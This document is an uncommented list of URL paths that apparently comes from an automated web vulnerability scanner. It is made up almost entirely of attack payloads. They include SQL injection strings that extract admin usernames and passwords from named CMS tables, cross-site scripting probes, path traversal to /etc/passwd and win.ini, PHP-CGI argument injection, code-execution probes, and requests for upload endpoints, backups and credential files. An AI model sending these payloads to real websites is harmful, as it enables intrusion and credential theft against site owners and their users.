/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/
/wp-admin
/admin.php
/jsky_web_scanner_test_file.txt
/dede/
/administrator/
/nosec_Web_Scanner_Test.dll
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/user
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/TRACE_test
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/TRACK_test
/
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/_vti_bin/_vti_adm/admin.dll
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/_vti_bin/_vti_aut/author.dll
/_vti_bin/shtml.exe?_vti_rpc
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/server-info
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/server-status
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/jmx-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/.../.../.../.../.../.../.../.../windows/win.ini
/webscan360noThisFile*~1*/.aspx
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/etc/passwd
/etc/passwd
/phpMyAdmin/show_config_errors.php
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/xampp/index.php
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/?search=just_test_not_find_href
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/$
/.../.../.../.../.../.../.../.../etc/passwd
/solr/dev/admin/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/level/15/exec/-/show/running-config/CR
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/plugins/weathermap/weathermap-cacti-plugin.php
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%3Cscript%3Ealert(42873).do
/icons/index
/%3Cscript%20s%3Ealert(42873)
/icons/small/index
/?%22onmouseover='prompt(42873)'bad=%22%3E
/%22%3E%3CsCrIpT%3Eprompt(42873)
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/'IHLD
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/install.php
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/extras/curltest.php?url=file://curltest.php
/.svn/entries
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet/
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/
/js/calendar.php?lang=../js
/
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/flow.php?step=login
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
